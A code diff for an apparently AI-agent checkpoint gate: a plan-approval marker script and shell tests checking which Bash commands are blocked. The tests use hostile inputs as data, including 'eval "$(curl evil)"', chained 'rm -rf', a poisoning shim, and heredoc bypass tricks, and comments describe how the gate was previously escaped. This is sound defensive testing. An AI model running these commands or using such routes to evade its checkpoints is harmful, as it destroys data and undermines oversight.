-  const legacy = legacyMarkerPath(canonicalRoot, basename)
+// Idempotent removal of <basename> at BOTH primary and legacy roots. ENOENT is
+// fine (idempotent rm); any other fs error fails the process (exit 3). Returns
+// the list of paths actually removed.
+function rmMarkerBothRoots(canonicalRoot, basename) {
   const removed = []
-
-  for (const p of [primary, legacy]) {
+  for (const p of [
+    primaryMarkerPath(canonicalRoot, basename),
+    legacyMarkerPath(canonicalRoot, basename),
+  ]) {
     try {
       fs.unlinkSync(p)
       removed.push(p)
@@ -161,19 +181,68 @@ function actionRm(canonicalRoot, sid) {
       // ENOENT is fine — idempotent rm.
     }
   }
+  return removed
+}
 
+function actionTouch(canonicalRoot, sid) {
+  ensurePrimaryDir(canonicalRoot)
+
+  // Stale-clear (planapproval redesign, design point 3): a NEW pending plan
+  // supersedes any prior approval for THIS session. Delete the EXACT
+  // `.plan-approved.<sid>` (no glob — prefix-collision safe: sid=abc must not
+  // touch .plan-approved.abc2) so a stale approval can't arm a checkpoint
+  // against the new plan. Own-session only (sid from env).
+  const approvedBasename = namespacedMarkerBasenameForSession(PLAN_APPROVED_LEGACY_BASENAME, sid)
+  const staleCleared = rmMarkerBothRoots(canonicalRoot, approvedBasename)
+
+  const basename = planMarkerBasenameForSession(sid)
+  const finalPath = atomicWriteEmpty(canonicalRoot, basename)
+
+  process.stdout.write(JSON.stringify({ status: 'ok', path: finalPath, staleCleared, sid }) + '\n')
+  process.exit(0)
+}
+
+function actionApprove(canonicalRoot, sid) {
+  // The ONLY sanctioned plan approval (planapproval redesign, design point 1).
+  // Bare `rm` of the pending marker no longer implies approval — only this
+  // action creates the `.plan-approved.<sid>` token that checkpoint-gate's
+  // arm consumes.
+  //
+  // Ordering = fail-safe toward "plan still pending": create the approval token
+  // FIRST (atomic rename), THEN remove the pending marker. If the create fails,
+  // pending remains (no spurious arm). If the rm fails after create, both exist
+  // briefly — plan-gate still blocks on pending, so no write arms until pending
+  // clears; harmless and self-corrects on the next --approve/--rm.
+  ensurePrimaryDir(canonicalRoot)
+  const approvedBasename = namespacedMarkerBasenameForSession(PLAN_APPROVED_LEGACY_BASENAME, sid)
+  const approvedPath = atomicWriteEmpty(canonicalRoot, approvedBasename)
+
+  const pendingBasename = planMarkerBasenameForSession(sid)
+  const removed = rmMarkerBothRoots(canonicalRoot, pendingBasename)
+
+  process.stdout.write(JSON.stringify({ status: 'ok', approved: approvedPath, removed, sid }) + '\n')
+  process.exit(0)
+}
+
+function actionRm(canonicalRoot, sid) {
+  // F3 narrowed: rm ONLY the SUFFIXED form at primary + legacy roots.
+  // Bare suffix-less `.plan-approval-pending` is never touched — its
+  // lifecycle is owned by SessionStart orphan-sweep during burn-in.
+  const basename = planMarkerBasenameForSession(sid)
+  const removed = rmMarkerBothRoots(canonicalRoot, basename)
   process.stdout.write(JSON.stringify({ status: 'ok', removed, sid }) + '\n')
   process.exit(0)
 }
 
 function main() {
-  const { root, touch, rm } = parseArgs(process.argv)
+  const { root, touch, rm, approve } = parseArgs(process.argv)
 
-  if (touch && rm) {
-    fail(6, 'MUTEX_VIOLATION: cannot specify both --touch and --rm')
+  const actionCount = (touch ? 1 : 0) + (rm ? 1 : 0) + (approve ? 1 : 0)
+  if (actionCount > 1) {
+    fail(6, 'MUTEX_VIOLATION: specify exactly one of --touch, --rm, or --approve')
   }
-  if (!touch && !rm) {
-    fail(6, 'MISSING_ACTION: specify exactly one of --touch or --rm')
+  if (actionCount === 0) {
+    fail(6, 'MISSING_ACTION: specify exactly one of --touch, --rm, or --approve')
   }
 
   const sid = getSessionIdOrExit()
@@ -181,8 +250,10 @@ function main() {
 
   if (touch) {
     actionTouch(canonicalRoot, sid)
-  } else {
+  } else if (rm) {
     actionRm(canonicalRoot, sid)
+  } else {
+    actionApprove(canonicalRoot, sid)
   }
 }
 

--- a/tests/test-checkpoint-gate.sh
+++ b/tests/test-checkpoint-gate.sh
@@ -510,8 +510,8 @@ assert_blocked "65. marker-write THEN && chained shared_write — arms + blocks"
   "$(mock_json 'Bash' "echo content > $PRE_DONE && rm -rf /tmp/IMPORTANT")" "Checkpoint required"
 assert_blocked "66. marker-write THEN || chained shared_write — arms + blocks" \
   "$(mock_json 'Bash' "echo content > $PRE_DONE || rm -rf /tmp/IMPORTANT")" "Checkpoint required"
-assert_blocked "67. marker-write THEN | piped shared_write — arms + blocks" \
-  "$(mock_json 'Bash' "echo content > $PRE_DONE | tee /tmp/log")" "Checkpoint required"
+assert_blocked "67. marker-write THEN | piped shared_write — held for classification + blocks" \
+  "$(mock_json 'Bash' "echo content > $PRE_DONE | tee /tmp/log")" "Classify it ONCE"
 assert_blocked "67b. marker-write THEN newline + ; chained shared_write — arms + blocks (#72)" \
   "$(mock_json 'Bash' "echo content > $PRE_DONE
 ; rm -rf /tmp/IMPORTANT")" "Checkpoint required"
@@ -1665,9 +1665,9 @@ assert_allowed "NC-7. Symlink → allowed canonical path allowed (canonicalize f
 #    the cache (it was allowed under the F1 residual). ──
 SYMLINK_TO_EVIL="$SYMLINK_HELPER_DIR/classifier-marker-evil.mjs"
 ln -sf "$SHIMMED_HELPER" "$SYMLINK_TO_EVIL"
-assert_blocked "NC-8. Symlink → shimmed binary now arms + blocks (F1 closed)" \
+assert_blocked "NC-8. Symlink → shimmed binary held for classification + blocks (F1 closed)" \
   "$(mock_json 'Bash' "node $SYMLINK_TO_EVIL --write --project-root $TEST_DIR --caller-cwd $TEST_DIR --command 'foo' --session-id abc --label read_only --confidence 0.9 --reason test")" \
-  "Checkpoint required"
+  "Classify it ONCE"
 
 # ── Plan-pending invariant preserved: classifier-marker BLOCKED while plan-pending ──
 # (Even with carve-out, plan-pending check fires earlier and blocks marker_write.)
@@ -1817,7 +1817,7 @@ assert_allowed "PP-2. node em-search (read_only) allowed, nothing armed" \
 # evaluated command framed planning-time inspection as implementation.)
 assert_blocked "PP-3. novel review command blocks (held for classification, no pre-arm)" \
   "$(mock_pp_bash 'node scripts/second-opinion.mjs request --provider codex --dispatch' "$PP_SID_A")" \
-  "Checkpoint required"
+  "Classify it ONCE"
 assert_marker_absent "PP-4. novel interpreter_other Bash did NOT arm .checkpoint-required.<sidA> (agent-classifier-first)" \
   "$PP_MARKER_DIR/.checkpoint-required.$PP_SID_A"
 assert_marker_absent "PP-4b. planning Bash did NOT arm legacy .checkpoint-required" \
@@ -1921,13 +1921,13 @@ assert_marker_absent "B2-5. no nonsrc_write command armed .checkpoint-required" 
 # deadlocked the stop-gate.)
 reset_state
 assert_blocked "B2-6. novel shared_write Bash (cp, default_write) blocks (held for classification)" \
-  "$(mock_json 'Bash' 'cp /etc/hosts scripts/x.txt')" "Checkpoint required"
+  "$(mock_json 'Bash' 'cp /etc/hosts scripts/x.txt')" "Classify it ONCE"
 assert_marker_absent "B2-7. novel shared_write Bash did NOT arm .checkpoint-required (agent-classifier-first)" "$PRE_REQ"
 # interpreter_other (a non-allowlisted node script) is the SAME unevaluated-novel
 # class — also held, also no arm. This is the canonical node-script friction.
 reset_state
 assert_blocked "B2-7c. novel interpreter_other Bash (node foo.mjs) blocks (held)" \
-  "$(mock_json 'Bash' 'node scripts/foo.mjs --run')" "Checkpoint required"
+  "$(mock_json 'Bash' 'node scripts/foo.mjs --run')" "Classify it ONCE"
 assert_marker_absent "B2-7d. novel interpreter_other Bash did NOT arm" "$PRE_REQ"
 # Boundary guard: a RECOGNIZED write reason (allowlisted cmd + redirect →
 # readonly_cmd_redirected) is NOT unevaluated-novel and STILL arms conservatively.

--- a/tests/test-checkpoint-gate.sh
+++ b/tests/test-checkpoint-gate.sh
@@ -145,9 +145,12 @@ assert_blocked "4.  Bare MultiEdit conservatively blocks (empty path)" \
   "$(mock_json 'MultiEdit')" "Checkpoint required"
 assert_marker_absent "4a. Empty-path conservative block did NOT arm .checkpoint-required (no leak)" "$PRE_REQ"
 assert_allowed "5.  Bash read-only allowed in idle" "$(mock_json 'Bash' 'ls')"
-assert_allowed "6.  git push allowed in idle (push-gate inactive — no POST_REQ)" \
-  "$(mock_json 'Bash' 'git push origin main')"
-assert_marker_absent "7.  post-required NOT armed in idle" "$POST_REQ"
+# B1 (#351, PR-B2): push self-arms .post-checkpoint-required regardless of
+# pre-checkpoint state, so even an idle push blocks until the post-checkpoint is
+# written — push is now an INDEPENDENT hard gate (D7 backstop). Was: allowed.
+assert_blocked "6.  git push in idle self-arms + blocks (B1 hard gate)" \
+  "$(mock_json 'Bash' 'git push origin main')" "Post-implementation checkpoint required"
+assert_marker_exists "7.  push self-armed post-required in idle (B1)" "$POST_REQ"
 
 # ============================================================================
 echo ""
@@ -162,21 +165,20 @@ assert_allowed "10. Grep allowed (always)" "$(mock_json 'Grep')"
 assert_blocked "11. Edit blocked by pre-gate" "$(mock_json 'Edit')" "Checkpoint required"
 assert_blocked "12. Write blocked by pre-gate" "$(mock_json 'Write')" "Checkpoint required"
 assert_blocked "13. MultiEdit blocked by pre-gate" "$(mock_json 'MultiEdit')" "Checkpoint required"
-# Planning-passive redesign (2026-05-25): Bash is no longer pre-gated. ALL
-# Bash (read_only AND shared_write) passes the pre-gate; only push_or_pr_create
-# (push-gate) and the marker_write allowlist still gate Bash. shared_write Bash
-# that formerly blocked here is now allowed (F1 residual — pure-Bash
-# implementation bypasses the checkpoint; closure tracked via PR-B). The
-# classifier's read_only/shared_write boundary is still exercised in
-# tests/test-command-classifier.sh.
-assert_allowed "14. Bash shared_write now allowed during pre-gate (Bash ungated)" \
-  "$(mock_json 'Bash' 'echo hello > /tmp/somefile')"
+# PR-B2 (#351, F1 CLOSED): the planning-passive redesign left Bash ungated (the
+# F1 residual — a pure-Bash shared_write implementation bypassed the pre-gate).
+# PR-B2 closes it: shared_write / unsafe_complex / unknown Bash now ARMS + blocks
+# WITH the 3-way deny-hint. nonsrc_write + read_only stay free. The escapable
+# redirect (`> /tmp/x`) arms because the classifier carries no target; the agent
+# classifies it nonsrc_write once and retries (G1). The read_only/nonsrc/shared
+# boundary is exercised in tests/test-command-classifier.sh.
+assert_blocked "14. Bash shared_write now arms + blocks (F1 closed)" \
+  "$(mock_json 'Bash' 'echo hello > /tmp/somefile')" "Checkpoint required"
 assert_allowed "14b. Bash read-only echo allowed (#89)" \
   "$(mock_json 'Bash' 'echo hello')"
-# gh pr checkout mutates the local working tree (shared_write); with Bash
-# ungated it is now allowed during the pre-gate (was blocked pre-redesign).
-assert_allowed "14c. gh pr checkout now allowed during pre-gate (Bash ungated)" \
-  "$(mock_json 'Bash' 'gh pr checkout 113')"
+# gh pr checkout mutates the working tree (shared_write) → arms + blocks (F1 closed).
+assert_blocked "14c. gh pr checkout arms + blocks (F1 closed)" \
+  "$(mock_json 'Bash' 'gh pr checkout 113')" "Checkpoint required"
 # Negative: read-only PR commands must still pass during pre-gate.
 assert_allowed "14d. gh pr view allowed by pre-gate (read_only)" \
   "$(mock_json 'Bash' 'gh pr view 113')"
@@ -225,18 +227,18 @@ assert_allowed "18h. cat <&5 input-fd-dup allowed" \
 assert_allowed "18i. &>>/dev/null allowed" \
   "$(mock_json 'Bash' 'ls &>>/dev/null')"
 
-# Planning-passive: real-file redirects classify as shared_write and — with
-# Bash ungated — are now ALLOWED during the pre-gate (formerly blocked). The
-# fd-dup vs real-file-redirect classifier boundary is owned by FD20-FD24 in
+# PR-B2 (#351, F1 CLOSED): real-file redirects classify as shared_write → now
+# ARM + block (were allowed under the F1 residual). The fd-dup vs real-file-
+# redirect classifier boundary is owned by FD20-FD24 in
 # tests/test-command-classifier.sh; one representative kept here as a gate
 # regression guard.
-assert_allowed "18j. real file redirect (2>file) now allowed (shared_write, Bash ungated)" \
-  "$(mock_json 'Bash' 'ls 2>/tmp/err.log')"
-# fd-dup followed by push: classifier reduces to push_or_pr_create, but the
-# push-gate is inactive without POST_REQ (only PRE_REQ armed here) → allowed.
-# Chained-push blocking under POST_REQ is covered by tests 68 / 77-80.
-assert_allowed "18o. fd-dup then push allowed (push-gate inactive — no POST_REQ)" \
-  "$(mock_json 'Bash' 'git status 2>&1 && git push')"
+assert_blocked "18j. real file redirect (2>file) arms + blocks (F1 closed)" \
+  "$(mock_json 'Bash' 'ls 2>/tmp/err.log')" "Checkpoint required"
+# fd-dup followed by push: classifier reduces to push_or_pr_create → B1 push
+# self-arm fires: POST_REQ self-armed this invocation → block. (Was allowed —
+# push-gate inactive without POST_REQ.)
+assert_blocked "18o. fd-dup then push self-arms + blocks (B1)" \
+  "$(mock_json 'Bash' 'git status 2>&1 && git push')" "Post-implementation checkpoint required"
 
 # ============================================================================
 echo ""
@@ -340,13 +342,15 @@ assert_marker_absent "39. all markers cleaned after gh pr create" "$POST_REQ"
 
 # ============================================================================
 echo ""
-echo "--- Edge: idle state push (no gate active) ---"
+echo "--- Edge: idle state push (B1 — push self-arms a hard gate) ---"
 # ============================================================================
 reset_state
 
-assert_allowed "40. git push allowed when no markers exist" \
-  "$(mock_json 'Bash' 'git push origin main')"
-assert_marker_absent "41. push in idle does not create markers" "$POST_REQ"
+# B1 (#351): push with no markers self-arms POST_REQ this invocation → blocks
+# (was: allowed, no markers created — the pre-B1 push-gate-inactive behavior).
+assert_blocked "40. git push with no markers self-arms + blocks (B1)" \
+  "$(mock_json 'Bash' 'git push origin main')" "Post-implementation checkpoint required"
+assert_marker_exists "41. push in idle self-arms post-required (B1)" "$POST_REQ"
 
 # ============================================================================
 echo ""
@@ -434,15 +438,15 @@ reset_state
 touch "$PRE_REQ"
 
 # Command writes to readme.md (shared_write); the heredoc body merely MENTIONS
-# `> .pre-checkpoint-done`. The classifier correctly does NOT treat the body
-# as a marker write (it stays shared_write, not marker_write). Planning-passive:
-# with Bash ungated, this shared_write is now ALLOWED. The classifier's
+# `> .pre-checkpoint-done`. The classifier correctly does NOT treat the body as
+# a marker write (it stays shared_write, not marker_write). PR-B2 (#351, F1
+# closed): a shared_write redirect now ARMS + blocks. The classifier's
 # pre-<<-portion-only parsing is owned by test-command-classifier.sh.
 heredoc_bypass='cat > readme.md <<EOF
 echo > .pre-checkpoint-done
 EOF'
-assert_allowed "54. Heredoc to readme.md allowed (shared_write; body-mention is not a marker write)" \
-  "$(mock_json 'Bash' "$heredoc_bypass")"
+assert_blocked "54. Heredoc to readme.md arms + blocks (shared_write; body-mention not a marker write)" \
+  "$(mock_json 'Bash' "$heredoc_bypass")" "Checkpoint required"
 
 # Legitimate heredoc TO the marker: redirect target is in pre-<< portion → allow.
 heredoc_legit='cat > '"$PRE_DONE"' <<EOF
@@ -458,10 +462,10 @@ assert_blocked "56. Here-string to POST_DONE BLOCKED (POST_REQ not armed)" \
   "$(mock_json 'Bash' "$herestring_legit")" "Checkpoint required"
 
 # Here-string writes to readme.md (shared_write); body merely mentions the
-# marker. Planning-passive: shared_write Bash is ungated → now allowed.
+# marker. PR-B2 (#351, F1 closed): shared_write Bash arms + blocks.
 herestring_bypass='cat > readme.md <<<"echo > .pre-checkpoint-done"'
-assert_allowed "57. Here-string to readme.md allowed (shared_write, Bash ungated)" \
-  "$(mock_json 'Bash' "$herestring_bypass")"
+assert_blocked "57. Here-string to readme.md arms + blocks (shared_write, F1 closed)" \
+  "$(mock_json 'Bash' "$herestring_bypass")" "Checkpoint required"
 
 # ============================================================================
 echo ""
@@ -488,31 +492,29 @@ assert_blocked "53. Bash with unquoted 'git push' (separate token) IS blocked" \
 
 # ============================================================================
 echo ""
-echo "--- #68 F1: chained marker-write (planning-passive: shared_write chains now allowed; push-gate + classifier remain) ---"
+echo "--- #68 F1 CLOSED (PR-B2 #351): chained marker-write reduces to shared_write → arms + blocks ---"
 # ============================================================================
-# Planning-passive (2026-05-25): a marker-write CHAINED with another command
-# reduces (most-restrictive) to shared_write, and with Bash ungated shared_write
-# is ALLOWED. The former "chained command can't bypass the marker allowlist"
-# concern is moot — there is no Bash pre-gate to bypass, and a bare `rm` was
-# already allowed under the F1 residual. Two real boundaries remain and are
-# asserted elsewhere: (1) the push-gate still blocks a chained `git push` when
-# POST_REQ is armed (test 68); (2) the classifier's chain reduction is owned by
-# T70-T76 in test-command-classifier.sh. These chained-write shapes are kept as
-# gate regression guards confirming they now pass.
+# PR-B2 (#351): a marker-write CHAINED with another command reduces (most-
+# restrictive) to shared_write — and shared_write Bash now ARMS + blocks (F1
+# closed). The chain's marker_write segment no longer wins, so the gate's
+# marker_write allowlist is bypassed and the Bash arm fires. This is the
+# intended closure: a chained shared_write can no longer ride a marker-write
+# prefix to escape the pre-checkpoint. The classifier's chain reduction is owned
+# by T70-T76 in test-command-classifier.sh.
 reset_state
 touch "$PRE_REQ"
 
-assert_allowed "64. marker-write THEN ; chained shared_write — allowed (Bash ungated, F1 residual)" \
-  "$(mock_json 'Bash' "echo content > $PRE_DONE; rm -rf /tmp/IMPORTANT")"
-assert_allowed "65. marker-write THEN && chained shared_write — allowed" \
-  "$(mock_json 'Bash' "echo content > $PRE_DONE && rm -rf /tmp/IMPORTANT")"
-assert_allowed "66. marker-write THEN || chained shared_write — allowed" \
-  "$(mock_json 'Bash' "echo content > $PRE_DONE || rm -rf /tmp/IMPORTANT")"
-assert_allowed "67. marker-write THEN | piped shared_write — allowed" \
-  "$(mock_json 'Bash' "echo content > $PRE_DONE | tee /tmp/log")"
-assert_allowed "67b. marker-write THEN newline + ; chained shared_write — allowed (#72)" \
+assert_blocked "64. marker-write THEN ; chained shared_write — arms + blocks (F1 closed)" \
+  "$(mock_json 'Bash' "echo content > $PRE_DONE; rm -rf /tmp/IMPORTANT")" "Checkpoint required"
+assert_blocked "65. marker-write THEN && chained shared_write — arms + blocks" \
+  "$(mock_json 'Bash' "echo content > $PRE_DONE && rm -rf /tmp/IMPORTANT")" "Checkpoint required"
+assert_blocked "66. marker-write THEN || chained shared_write — arms + blocks" \
+  "$(mock_json 'Bash' "echo content > $PRE_DONE || rm -rf /tmp/IMPORTANT")" "Checkpoint required"
+assert_blocked "67. marker-write THEN | piped shared_write — arms + blocks" \
+  "$(mock_json 'Bash' "echo content > $PRE_DONE | tee /tmp/log")" "Checkpoint required"
+assert_blocked "67b. marker-write THEN newline + ; chained shared_write — arms + blocks (#72)" \
   "$(mock_json 'Bash' "echo content > $PRE_DONE
-; rm -rf /tmp/IMPORTANT")"
+; rm -rf /tmp/IMPORTANT")" "Checkpoint required"
 
 # Push-gate variant: chained post-marker-write THEN git push must block
 echo "pre done" > "$PRE_DONE"
@@ -582,17 +584,18 @@ heredoc_chain1="cat > $PRE_DONE <<EOF
 rule18
 EOF
 rm -rf /tmp/IMPORTANT"
-assert_allowed "81. heredoc + post-EOF ; chained shared_write — allowed (Bash ungated, #73)" \
-  "$(mock_json 'Bash' "$heredoc_chain1")"
+assert_blocked "81. heredoc + post-EOF ; chained shared_write — arms + blocks (#73, F1 closed)" \
+  "$(mock_json 'Bash' "$heredoc_chain1")" "Checkpoint required"
 
 heredoc_chain2="cat > $PRE_DONE <<EOF
 rule18
 EOF
 && git push origin main"
-# Chained git push, but push-gate is inactive without POST_REQ (only PRE_REQ
-# armed here) → allowed. Chained-push blocking under POST_REQ is test 68.
-assert_allowed "82. heredoc + post-EOF && git push — allowed (push-gate inactive)" \
-  "$(mock_json 'Bash' "$heredoc_chain2")"
+# Chained git push → reduces to push_or_pr_create → B1 push self-arm fires
+# (POST_REQ self-armed this invocation) → block. (Was: allowed — push-gate
+# inactive without POST_REQ.)
+assert_blocked "82. heredoc + post-EOF && git push — self-arms + blocks (B1)" \
+  "$(mock_json 'Bash' "$heredoc_chain2")" "Post-implementation checkpoint required"
 
 # <<- form (leading tabs allowed on terminator) with post content
 # Session 1: classifier distinguishes chained-command intent. A chained
@@ -605,10 +608,10 @@ heredoc_dash=$(printf 'cat > %s <<-EOF\n\tcontent\n\tEOF\necho leak' "$PRE_DONE"
 assert_allowed "83. <<-EOF + read-only echo chain — allowed (read_only chain)" \
   "$(mock_json 'Bash' "$heredoc_dash")"
 
-# Adversarial dash-EOF with rm chain still blocks (rm is shared_write).
+# Adversarial dash-EOF with rm chain → shared_write → arms + blocks (F1 closed).
 heredoc_dash_evil=$(printf 'cat > %s <<-EOF\n\tcontent\n\tEOF\nrm -rf /tmp/IMPORTANT' "$PRE_DONE")
-assert_allowed "83b. <<-EOF + rm chain — allowed (shared_write, Bash ungated)" \
-  "$(mock_json 'Bash' "$heredoc_dash_evil")"
+assert_blocked "83b. <<-EOF + rm chain — arms + blocks (shared_write, F1 closed)" \
+  "$(mock_json 'Bash' "$heredoc_dash_evil")" "Checkpoint required"
 
 heredoc_quoted="cat > $PRE_DONE <<'EOF'
 literal text
@@ -621,8 +624,8 @@ heredoc_quoted_evil="cat > $PRE_DONE <<'EOF'
 literal text
 EOF
 rm -rf /tmp/IMPORTANT"
-assert_allowed "84b. <<'EOF' + rm chain — allowed (shared_write, Bash ungated)" \
-  "$(mock_json 'Bash' "$heredoc_quoted_evil")"
+assert_blocked "84b. <<'EOF' + rm chain — arms + blocks (shared_write, F1 closed)" \
+  "$(mock_json 'Bash' "$heredoc_quoted_evil")" "Checkpoint required"
 
 # Pure heredoc (regression): no post-EOF content → still allowed
 pure_heredoc="cat > $PRE_DONE <<EOF
@@ -642,7 +645,7 @@ assert_allowed "86. Pure heredoc + trailing whitespace — still allowed" \
 
 # ============================================================================
 echo ""
-echo "--- #75: extended terminator forms (planning-passive: shared_write chains now allowed) ---"
+echo "--- #75: extended terminator forms (PR-B2 #351: shared_write chains arm + block) ---"
 # ============================================================================
 # Per Step-6 adversarial probe of #73 fix: <<\EOF (backslash-escaped) and
 # <<123 (digit-start) terminators were valid bash forms my initial sed regex
@@ -654,24 +657,24 @@ heredoc_backslash='cat > '"$PRE_DONE"' <<\EOF
 rule18
 EOF
 rm -rf /tmp/IMPORTANT'
-assert_allowed "87. <<\\EOF backslash-escaped terminator + rm chain — allowed (shared_write, #75)" \
-  "$(mock_json 'Bash' "$heredoc_backslash")"
+assert_blocked "87. <<\\EOF backslash-escaped terminator + rm chain — arms + blocks (shared_write, #75)" \
+  "$(mock_json 'Bash' "$heredoc_backslash")" "Checkpoint required"
 
 # <<123 (numeric-only terminator) with post chain
 heredoc_numeric='cat > '"$PRE_DONE"' <<123
 rule18
 123
 rm -rf /tmp/IMPORTANT'
-assert_allowed "88. <<123 numeric-only terminator + rm chain — allowed (shared_write, #75)" \
-  "$(mock_json 'Bash' "$heredoc_numeric")"
+assert_blocked "88. <<123 numeric-only terminator + rm chain — arms + blocks (shared_write, #75)" \
+  "$(mock_json 'Bash' "$heredoc_numeric")" "Checkpoint required"
 
 # <<==EOF== (special chars in terminator) — bash valid
 heredoc_special='cat > '"$PRE_DONE"' <<==EOF==
 rule18
 ==EOF==
 rm -rf /tmp/IMPORTANT'
-assert_allowed "89. <<==EOF== special-char terminator + rm chain — allowed (shared_write, #75)" \
-  "$(mock_json 'Bash' "$heredoc_special")"
+assert_blocked "89. <<==EOF== special-char terminator + rm chain — arms + blocks (shared_write, #75)" \
+  "$(mock_json 'Bash' "$heredoc_special")" "Checkpoint required"
 
 # Regression: <<\EOF without post-EOF content still allowed
 heredoc_backslash_pure='cat > '"$PRE_DONE"' <<\EOF
@@ -1655,12 +1658,16 @@ ln -sf "$GLOBAL_HELPER" "$SYMLINK_HELPER"
 assert_allowed "NC-7. Symlink → allowed canonical path allowed (canonicalize follows symlink)" \
   "$(mock_json 'Bash' "node $SYMLINK_HELPER --write --project-root $TEST_DIR --caller-cwd $TEST_DIR --command 'foo' --session-id abc --label read_only --confidence 0.9 --reason test")"
 
-# ── Symlink to shimmed location → now ALLOWED (Bash ungated; canonicalize still
-#    unmasks the target so the validator rejects, but rejection is unobservable) ──
+# ── Symlink to shimmed location → now BLOCKED (PR-B2 #351). The shim's basename
+#    is classifier-marker-evil.mjs, so it does NOT match the classifier-marker.mjs
+#    case-arm → interpreter_other → shared_write → the Bash arm fires. F1 closure
+#    is a security improvement here: the shim command can no longer RUN to poison
+#    the cache (it was allowed under the F1 residual). ──
 SYMLINK_TO_EVIL="$SYMLINK_HELPER_DIR/classifier-marker-evil.mjs"
 ln -sf "$SHIMMED_HELPER" "$SYMLINK_TO_EVIL"
-assert_allowed "NC-8. Symlink → shimmed binary now allowed (Bash ungated, F1 residual)" \
-  "$(mock_json 'Bash' "node $SYMLINK_TO_EVIL --write --project-root $TEST_DIR --caller-cwd $TEST_DIR --command 'foo' --session-id abc --label read_only --confidence 0.9 --reason test")"
+assert_blocked "NC-8. Symlink → shimmed binary now arms + blocks (F1 closed)" \
+  "$(mock_json 'Bash' "node $SYMLINK_TO_EVIL --write --project-root $TEST_DIR --caller-cwd $TEST_DIR --command 'foo' --session-id abc --label read_only --confidence 0.9 --reason test")" \
+  "Checkpoint required"
 
 # ── Plan-pending invariant preserved: classifier-marker BLOCKED while plan-pending ──
 # (Even with carve-out, plan-pending check fires earlier and blocks marker_write.)
@@ -1802,9 +1809,15 @@ assert_allowed "PP-1. read-only Bash (git status) allowed, nothing armed" \
   "$(mock_pp_bash 'git status' "$PP_SID_A")"
 assert_allowed "PP-2. node em-search (read_only) allowed, nothing armed" \
   "$(mock_pp_bash 'node scripts/em-search.mjs --tag x' "$PP_SID_A")"
-assert_allowed "PP-3. shared_write review command (second-opinion dispatch) allowed (Bash ungated)" \
-  "$(mock_pp_bash 'node scripts/second-opinion.mjs request --provider codex --dispatch' "$PP_SID_A")"
-assert_marker_absent "PP-4. planning Bash did NOT arm .checkpoint-required.<sidA>" \
+# PR-B2 (#351, F1 closed): a shared_write Bash command (second-opinion dispatch
+# is interpreter_other → shared_write) now ARMS + blocks with the 3-way deny-hint.
+# The agent classifies it once (read_only / nonsrc_write) and it is free
+# thereafter (G1) — the accepted classify-once friction. (Was: allowed, Bash
+# ungated — the F1 residual PR-B2 closes.)
+assert_blocked "PP-3. shared_write review command arms + blocks (F1 closed)" \
+  "$(mock_pp_bash 'node scripts/second-opinion.mjs request --provider codex --dispatch' "$PP_SID_A")" \
+  "Checkpoint required"
+assert_marker_exists "PP-4. shared_write Bash lazily armed .checkpoint-required.<sidA>" \
   "$PP_MARKER_DIR/.checkpoint-required.$PP_SID_A"
 assert_marker_absent "PP-4b. planning Bash did NOT arm legacy .checkpoint-required" \
   "$PP_MARKER_DIR/.checkpoint-required"
@@ -1879,6 +1892,70 @@ else
   echo "  ✓ #349. spaced classifier-marker path processed cleanly (de-quote extraction)"; ((passed++))
 fi
 rm -rf "$F1_SPACE_BASE"
+
+# ============================================================================
+echo ""
+echo "--- PR-B2 (#351): Bash nonsrc_write free-flow + shared_write arm + 3-way hint ---"
+# ============================================================================
+# nonsrc_write Bash (git metadata, package installs, dir ops, em-store) flows
+# FREE — never arms the pre-checkpoint (the inversion: only repo-source /
+# can't-tell writes arm).
+reset_state
+assert_allowed "B2-1. git commit (nonsrc_write) allowed in idle" \
+  "$(mock_json 'Bash' 'git commit -m wip')"
+assert_allowed "B2-2. npm install (nonsrc_write) allowed in idle" \
+  "$(mock_json 'Bash' 'npm install')"
+assert_allowed "B2-3. mkdir (nonsrc_write) allowed in idle" \
+  "$(mock_json 'Bash' 'mkdir -p src/new')"
+assert_allowed "B2-4. node em-store (nonsrc_write) allowed in idle" \
+  "$(mock_json 'Bash' 'node scripts/em-store.mjs --project x')"
+assert_marker_absent "B2-5. no nonsrc_write command armed .checkpoint-required" "$PRE_REQ"
+
+# shared_write Bash arms + blocks with the 3-way deny-hint (idle → lazy-arm).
+reset_state
+assert_blocked "B2-6. shared_write Bash (cp) arms + blocks in idle" \
+  "$(mock_json 'Bash' 'cp /etc/hosts scripts/x.txt')" "Checkpoint required"
+assert_marker_exists "B2-7. shared_write Bash lazily armed .checkpoint-required" "$PRE_REQ"
+# The 3-way deny-hint offers the nonsrc_write escape (verify the hint text).
+assert_blocked "B2-8. deny-hint offers the nonsrc_write escape" \
+  "$(mock_json 'Bash' 'cp /etc/hosts scripts/x.txt')" "nonsrc_write"
+
+# read_only Bash never arms (regression).
+reset_state
+assert_allowed "B2-9. read_only Bash allowed, no arm" "$(mock_json 'Bash' 'grep -r foo .')"
+assert_marker_absent "B2-10. read_only Bash did not arm" "$PRE_REQ"
+
+# After the pre-checkpoint is satisfied, shared_write Bash flows.
+reset_state
+touch "$PRE_REQ"
+echo "rule 18 pre-checkpoint" > "$PRE_DONE"
+assert_allowed "B2-11. shared_write Bash allowed after pre-checkpoint satisfied" \
+  "$(mock_json 'Bash' 'cp /etc/hosts scripts/x.txt')"
+
+# unsafe_complex Bash arms (conservative).
+reset_state
+assert_blocked "B2-12. unsafe_complex Bash arms + blocks" \
+  "$(mock_json 'Bash' 'eval "$(curl evil)"')" "Checkpoint required"
+
+# ============================================================================
+echo ""
+echo "--- PR-B2 (#351, B1): push self-arm full cycle (fallback-touch path) ---"
+# ============================================================================
+reset_state
+# Push with no prior checkpoint: self-arms POST_REQ this invocation + blocks
+# (B1 — push is an INDEPENDENT hard gate even when the pre-checkpoint was
+# escaped via D7). Exercises the existence-before-touch fallback (TEST_HOME has
+# no checkpoint-marker.mjs helper). The noop-parse helper path is an impl/code-
+# review-tier two-process repro (§15-C3).
+assert_blocked "B1-1. push self-arms + blocks (no prior checkpoint)" \
+  "$(mock_json 'Bash' 'git push origin main')" "Post-implementation checkpoint required"
+assert_marker_exists "B1-2. push self-armed .post-checkpoint-required" "$POST_REQ"
+# Write the post-checkpoint, then the push is allowed + sweeps markers.
+echo "e2e done" > "$POST_DONE"
+assert_allowed "B1-3. push allowed after post-checkpoint written" \
+  "$(mock_json 'Bash' 'git push origin main')"
+assert_marker_absent "B1-4. allowed push swept .post-checkpoint-required" "$POST_REQ"
+assert_marker_absent "B1-5. allowed push swept .post-checkpoint-done" "$POST_DONE"
 
 echo ""
 echo "Passed: $passed"

--- a/tests/test-checkpoint-gate.sh
